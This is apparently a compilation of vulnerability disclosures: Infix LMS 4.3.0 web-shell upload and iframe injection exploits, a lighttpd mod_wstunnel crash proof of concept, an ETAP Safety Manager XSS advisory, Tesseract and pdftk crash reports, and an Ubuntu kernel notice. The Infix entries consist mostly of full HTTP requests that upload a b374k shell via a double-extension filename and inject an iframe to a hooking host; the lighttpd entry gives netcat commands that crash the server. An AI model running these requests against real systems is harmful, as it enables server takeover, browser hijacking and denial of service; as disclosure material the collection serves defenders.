Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection  
# Exploit Author: th3d1gger  
# Vendor Homepage: https://codecanyon.net  
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608  
# Version: 4.3.0  
# Tested on Ubuntu 18.04  
sign up as teacher  
go course page and try to add course or edit  
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request--  
POST /admin/course/updateCourse HTTP/1.1  
Host: localhost  
Content-Length: 3855  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/admin/course/course-details/7?type=courseDetails  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D  
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="drip"

0  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="id"

7  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="about"

<p><p><br></p><p><br></p><p><br></p></p><p><p><iframe src="http://192.168.1.18:3000/uploads/test.html"></p></p><div><br></div><p><br></p><p><br></p><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text  
            ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="category"

4  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="sub_category"

7  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="mode_of_delivery"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="level"

2  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="language"

19  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="duration"

10  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="complete_order"

0  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="price"

20  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="is_discount"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="discount_price"

10  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="host"

Youtube  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="file"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="scope"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="image"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

In lighttpd 1.4.65, mod_wstunnel does not initialize a handler function pointer if an invalid HTTP request (websocket handshake) is received. It leads to null pointer dereference which crashes the server. It could be used by an external attacker to cause denial of service condition.

There's a null pointer dereference bug that crashes the whole server if mod\_wstunnel is enabled and the server receives invalid HTTP Websocket Handshake request. This issue could be abused by a remote attacker to cause Denial of Service condition.

The vulnerability was detected on Ubuntu 22.04 x86\_64:  
\- lighttpd 1.4.65 built from source  
\- lighttpd 1.4.63 installed from ubuntu repository  
\- lighttpd 1.4.66 from github (master, 5d80e41ab2585288b0bbe0ebf8f3e3b120a0f403)

In the "wstunnel\_handler\_setup" function, the server verifies a request and if it's valid, it initializes handler functions. If the request has invalid (not a number) value in the "Sec-WebSocket-Version" header, it sets http status to 400 and exits the function without setting "hctx->create\_env" function pointer. Then, the server reaches to the "gw\_write\_request" function where it tries to call "hctx->create\_env(hctx)", however, the "hctx->create\_env" value is null leading to crash.

mod\_wstunnel.c:  

    static handler_t wstunnel_handler_setup (request_st * const r, plugin_data * const p) {
        handler_ctx *hctx = r->plugin_ctx[p->id];
        int hybivers;
        hctx->errh = r->conf.errh;/*(for mod_wstunnel-specific DEBUG_* macros)*/
        hctx->conf = p->conf; /*(copies struct)*/
        hybivers = wstunnel_check_request(r, hctx);
        if (hybivers < 0) return HANDLER_FINISHED;
       [...]
        hctx->gw.create_env       = wstunnel_create_env;
        hctx->gw.handler_ctx_free = wstunnel_handler_ctx_free;
    
    

    static int wstunnel_check_request(request_st * const r, handler_ctx * const hctx) {
        const buffer * const vers =
          http_header_request_get(r, HTTP_HEADER_OTHER, CONST_STR_LEN("Sec-WebSocket-Version"));
        const long hybivers = (NULL != vers)
          ? light_isdigit(*vers->ptr) ? strtol(vers->ptr, NULL, 10) : -1
          : 0;
        if (hybivers < 0 || hybivers > INT_MAX) {
            DEBUG_LOG_ERR("%s", "invalid Sec-WebSocket-Version");
            r->http_status = 400; /* Bad Request */
            return -1;
        }
    
    

gw\_backend.c:  

    static handler_t gw_write_request(gw_handler_ctx * const hctx, request_st * const r) {
        switch(hctx->state) {
    [...]
        case GW_STATE_PREPARE_WRITE:
            /* ok, we have the connection */
    
            {
                handler_t rc = hctx->create_env(hctx);
                if (HANDLER_GO_ON != rc) {
    
    

**PoC:**

1\. Download and build the server from source:  

$ wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.65.tar.gz
$ tar zxf lighttpd-1.4.65.tar.gz 
$ cd lighttpd-1.4.65/
$ cmake -DCMAKE\_INSTALL\_PREFIX=/usr/local -Wno-dev .
$ make -j 4
$ sudo make install

2\. Prepare configuration

/home/osboxes/echo.pl:  

#!/usr/bin/perl -Tw
$SIG{PIPE} = 'IGNORE';
for (my $FH; accept($FH, STDIN); close $FH) {
    select($FH); $|=1; # $FH->autoflush;
    print $FH $\_ while (<$FH>);
}

/home/osboxes/webroot/ws.html:  

<!DOCTYPE html>

<pre id="log"></pre>
    <script>
          // helper function: log message to screen
          var logelt = document.getElementById('log');
  function log(msg) { logelt.textContent += msg + '\\n'; }
  // helper function: send websocket msg with count (1 .. 5)
  var ll = 0;
  function send\_msg() { if (++ll <= 5) { log('SEND: '+ll); ws.send(ll+'\\n'); } }
  // setup websocket with callbacks
  var ws = new WebSocket('ws://localhost:3000/ws/');
  ws.onopen = function()         { log('CONNECT\\n'); send\_msg(); };
  ws.onclose = function()        { log('DISCONNECT'); };
  ws.onmessage = function(event) { log('RECV: ' + event.data); send\_msg(); };
    </script>

/home/osboxes/server.conf:  

server.document-root = "/home/osboxes/webroot" 
server.port = 3000
mimetype.assign = (
  ".html" => "text/html",
)

server.modules += ("mod\_wstunnel")
wstunnel.server = (
  "/ws/" => (
    (
      "socket" => "/dev/shm/psock",
      "bin-path" => "/home/osboxes/echo.pl",
      "max-procs" => 1
    )
  )
)

3\. Run the server  

$ lighttpd -D -f ~/server.conf

4\. Optional - open a website in a browser to confirm that websocket configuration works  

$ firefox http://localhost:3000/ws.html

5\. Optional - send valid request  

$ echo -e "GET /ws/ HTTP/1.1\\r\\nHost: localhost\\r\\nSec-WebSocket-Version: 13\\r\\nSec-WebSocket-Extensions: permessage-deflate\\r\\nSec-WebSocket-Key: FCM5bSXLZW322otNERLYNA==\\r\\nConnection: keep-alive, Upgrade\\r\\nSec-Fetch-Dest: websocket\\r\\nSec-Fetch-Mode: websocket\\r\\nSec-Fetch-Site: same-origin\\r\\nUpgrade: websocket\\r\\n\\r\\n" | nc -v 127.0.0.1 3000
Connection to 127.0.0.1 3000 port \[tcp/\*\] succeeded!
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Sec-WebSocket-Accept: vdMhuNAtgTQZJEwrIEBtPElq0RM=
Connection: upgrade
Date: Tue, 02 Aug 2022 20:40:38 GMT
Server: lighttpd/1.4.65

6\. Send invalid request (\`Sec-WebSocket-Version: x\`) - crash the server  

$ echo -e "GET /ws/ HTTP/1.1\\r\\nHost: localhost\\r\\nSec-WebSocket-Version: x\\r\\nSec-WebSocket-Extensions: permessage-deflate\\r\\nSec-WebSocket-Key: FCM5bSXLZW322otNERLYNA==\\r\\nConnection: keep-alive, Upgrade\\r\\nSec-Fetch-Dest: websocket\\r\\nSec-Fetch-Mode: websocket\\r\\nSec-Fetch-Site: same-origin\\r\\nUpgrade: websocket\\r\\n\\r\\n" | nc -v 127.0.0.1 3000
Connection to 127.0.0.1 3000 port \[tcp/\*\] succeeded!
HTTP/1.1 400 Bad Request
Transfer-Encoding: chunked
Date: Tue, 02 Aug 2022 20:41:13 GMT
Server: lighttpd/1.4.65

$ lighttpd -D -f server.conf 
2022-08-02 16:39:44: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)
    Segmentation fault (core dumped)

$ gdb --args lighttpd -D -f server.conf 
(gdb) r
Starting program: /usr/local/sbin/lighttpd -D -f server.conf
\[Thread debugging using libthread\_db enabled\]
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".
2022-08-02 16:41:47: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) up
#1  0x000055555559d75e in gw\_write\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:1993
1993                handler\_t rc = hctx->create\_env(hctx);
(gdb) print hctx->create\_env
$1 = (handler\_t (\*)(struct gw\_handler\_ctx \*)) 0x0
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x000055555559d75e in gw\_write\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:1993
#2  0x000055555559dd27 in gw\_send\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:2154
#3  0x000055555559e1f6 in gw\_handle\_subrequest (r=0x5555555e1230, p\_d=0x5555555db1f0) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:2264
#4  0x000055555556a857 in connection\_handle\_write\_state (r=0x5555555e1230, con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:473
#5  0x000055555556bd67 in connection\_state\_machine\_loop (r=0x5555555e1230, con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1028
#6  0x000055555556c805 in connection\_state\_machine\_h1 (con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1341
#7  0x000055555556c87d in connection\_state\_machine (con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1356
#8  0x0000555555566b4c in server\_run\_con\_queue (joblist=0x5555555e1230, sentinel=0x5555555d3b60 <log\_con\_jqueue>) at /home/osboxes/lighttpd-1.4.65/src/server.c:1958
#9  0x0000555555566c95 in server\_main\_loop (srv=0x5555555d5540) at /home/osboxes/lighttpd-1.4.65/src/server.c:2011
#10 0x0000555555566e86 in main (argc=4, argv=0x7fffffffe138) at /home/osboxes/lighttpd-1.4.65/src/server.c:2085

Discovered by Michał Dardas

CVE-2022-37797: Bug #3165: mod_wstunnel null pointer dereference - Lighttpd

Input passed to the GET parameter 'action' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

Title: ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS  
Advisory ID: ZSL-2022-5711  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (4/5)  
Release Date: 11.09.2022

**Summary**

The ETAP Safety Manager (ESM) is a central managing and control system that helps you to monitor, adjust and maintain your emergency lighting system. Therefore each luminaire connected to your ESM network is given a unique code. The ESM can easily identify the luminaires individually and automatically report whether all luminaires work properly. You can either choose between a wired or wireless network, or a combination of both. With ESM you will not only manage your self contained or your centrally supplied ‘ETAP Battery System’ (EBS) emergency luminaires’, but also DALI emergency units and K9 LED modules, which you can build into your luminaires. Since your ESM system is connected to the Internet, you will always have access to it through the World Wide Web. ESMweb™ is an ‘embedded web server’ application for monitoring an emergency lighting system, which runs in the ‘ESM web controller’. The ESMweb™ application can be accessed from any PC in the corporate network or connected to the Internet - by a standard web browser.

**Description**

Input passed to the GET parameter 'action' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

**Vendor**

ETAP Lighting International NV - https://www.etaplighting.com

**Affected Version**

1.0.0.32

**Tested On**

Apache/2.4.41 (Ubuntu)

**Vendor Status**

N/A

**PoC**

etap\_xss.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.09.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS

An issue in the Leptonica linked library (v1.79.0) in Tesseract v5.0.0 allows attackers to cause an arithmetic exception leading to a Denial of Service (DoS) via a crafted JPEG file.

****System Configuration****

*   tesseract version: 5.0.0-alpha-20210401
*   linked library version:  
    leptonica-1.79.0  
    libgif 5.1.4 : libjpeg 8d (libjpeg-turbo 2.0.3) : libpng 1.6.37 : libtiff 4.1.0 : zlib 1.2.11 : libwebp 0.6.1 : libopenjp2 2.3.1  
    Found AVX512BW  
    Found AVX512F  
    Found AVX2  
    Found AVX  
    Found FMA  
    Found SSE  
    Found OpenMP 201511  
    Found libcurl/7.68.0 GnuTLS/3.6.13 zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3
*   Environment (Operating system, version and so on): Ubuntu 20.04.2 64bit

**Program received signal SIGFPE, Arithmetic exception.**

#0 0x00007ffff7dbe24a in pixBlockconvGray () from /lib/x86\_64-linux-gnu/liblept.so.5  
#1 0x00007ffff7dbeadd in pixBlockconv () from /lib/x86\_64-linux-gnu/liblept.so.5  
#2 0x00005555556b2d9b in tesseract::TextlineProjection::ConstructProjection (this=0x55555586e230, input\_block=input\_block@entry=0x55555587e110, rotation=..., nontext\_map=...) at ./src/ccstruct/image.h:34  
#3 0x00005555556980a7 in tesseract::StrokeWidth::GradeBlobsIntoPartitions (this=0x55555586ac20, pageseg\_mode=pageseg\_mode@entry=tesseract::PSM\_AUTO, rerotation=..., block=block@entry=0x55555587e110, nontext\_pix=...,  
denorm=, cjk\_script=0x0, projection=0x55555586e230, diacritic\_blobs=0x7fffffffd018, part\_grid=0x55555586e1d8, big\_parts=0x55555586e208) at src/textord/strokewidth.cpp:371  
#4 0x000055555566b4e5 in tesseract::ColumnFinder::FindBlocks (this=this@entry=0x55555586e0a0, pageseg\_mode=pageseg\_mode@entry=tesseract::PSM\_AUTO, scaled\_color=..., scaled\_factor=,  
input\_block=input\_block@entry=0x55555587e110, photo\_mask\_pix=..., thresholds\_pix=..., grey\_pix=..., pixa\_debug=0x7ffff624cbd0, blocks=0x7fffffffcf78, diacritic\_blobs=0x7fffffffd018, to\_blocks=0x7fffffffd020)  
at src/textord/colfind.cpp:295  
#5 0x00005555555b1c8f in tesseract::Tesseract::AutoPageSeg (this=0x7ffff6229010, pageseg\_mode=tesseract::PSM\_AUTO, blocks=0x555556f3f830, to\_blocks=0x7fffffffd020, diacritic\_blobs=0x7fffffffd018, osd\_tess=,  
osr=0x7fffffffd3d0) at src/ccmain/pagesegmain.cpp:226  
#6 0x00005555555b214d in tesseract::Tesseract::SegmentPage (this=0x7ffff6229010, input\_file=, blocks=0x555556f3f830, osd\_tess=osd\_tess@entry=0x0, osr=osr@entry=0x7fffffffd3d0) at ./src/ccutil/params.h:202  
#7 0x0000555555580e17 in tesseract::TessBaseAPI::FindLines (this=0x7fffffffe100) at /usr/include/c++/9/bits/basic\_string.h:2300  
#8 0x0000555555583608 in tesseract::TessBaseAPI::Recognize (this=0x7fffffffe100, monitor=0x0) at src/api/baseapi.cpp:838  
#9 0x0000555555583c0a in tesseract::TessBaseAPI::ProcessPage (this=this@entry=0x7fffffffe100, pix=0x55555587a110, page\_index=page\_index@entry=0x0,  
filename=filename@entry=0x7fffffffe77a "/home/ubuntu/Aws-Results/orcheFuzz-newbug/output\_tesseract\_of/initial\_crashes/2021-05-06-03:01:41\_0x7b7d0fd6\_0xb1c1261c", retry\_config=retry\_config@entry=0x0,  
timeout\_millisec=timeout\_millisec@entry=0x0, renderer=0x55555586e710) at src/api/baseapi.cpp:1259  
#10 0x0000555555584888 in tesseract::TessBaseAPI::ProcessPagesInternal (this=0x7fffffffe100, filename=, retry\_config=0x0, timeout\_millisec=0x0, renderer=0x55555586e710) at /usr/include/c++/9/bits/basic\_string.h:2300  
#11 0x0000555555584e33 in tesseract::TessBaseAPI::ProcessPages (this=0x7fffffffe100, filename=, retry\_config=, timeout\_millisec=, renderer=) at src/api/baseapi.cpp:1071  
#12 0x0000555555575ba5 in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffe528) at /usr/include/c++/9/bits/unique\_ptr.h:360  
#13 0x00007ffff771f0b3 in \_\_libc\_start\_main (main=0x555555574ee0 <main(int, char\*\*)>, argc=0x3, argv=0x7fffffffe528, init=, fini=, rtld\_fini=, stack\_end=0x7fffffffe518)  
at ../csu/libc-start.c:308  
#14 0x000055555557d1be in \_start () at /usr/include/x86\_64-linux-gnu/bits/stdio2.h:100

I've attached the file. Please download and check the file.  
2021-05-06-03\_01\_41\_0x7b7d0fd6\_0xb1c1261c.zip

CVE-2022-38266: While processing, division by zero causes an arithmetic exception · Issue #3498 · tesseract-ocr/tesseract

PDF Labs pdftk-java v3.2.3 was discovered to contain an infinite loop via the component /text/pdf/PdfReader.java.

Merged requested to merge taewookim7646/pdftk:bug-fix into master Jul 29, 2021

**System environment**

*   Ubuntu 16.04 LTS
*   openjdk version "11.0.11" 2021-04-20
*   OpenJDK Runtime Environment (build 11.0.11+9-Ubuntu-0ubuntu2.18.04)
*   OpenJDK 64-Bit Server VM (build 11.0.11+9-Ubuntu-0ubuntu2.18.04, mixed mode)
*   Gradle 7.0.1
*   pdftk version 71fb58a8

**Execution (crafted file pdftk\_PoC.zipzip)**

$ ./pdftk-2.02-dist/pdftk/**pdftk** ./CVE-2007-0103\_AcrobatReader output tmpf/tmp

*   the input file is retrieved from CVE-2007-0103 PoC file. I also included another file partially mutated from the PoC file.

An infinite loop occurs due to the object id pointing to itself. It occurs due to the kid object pointing parent object id.

I've developed a patch code.

Please check and confirm the patch code.

Edited Jul 29, 2021 by Taewoo Kim

CVE-2021-37819: bug fix: infinite loop caused by pdf object of a kid pointing to kid's parent (!21) · Merge requests · pdftk-java / pdftk-java · GitLab

Ubuntu Security Notice 5605-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5605-1September 09, 2022linux-azure-fde vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Asaf Modelevsky discovered that the Intel(R) 10GbE PCI Express (ixgbe)Ethernet driver for the Linux kernel performed insufficient control flowmanagement. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33061)It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33656)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1090-azure-fde  5.4.0-1090.95+cvm1.1   linux-image-azure-fde           5.4.0.1090.95+cvm1.30After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5605-1   CVE-2021-33061, CVE-2021-33656Package Information:   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1090.95+cvm1.1

Ubuntu Security Notice USN-5605-1

Sagemath version 9.0 suffers from overflow and denial of service vulnerabilities.

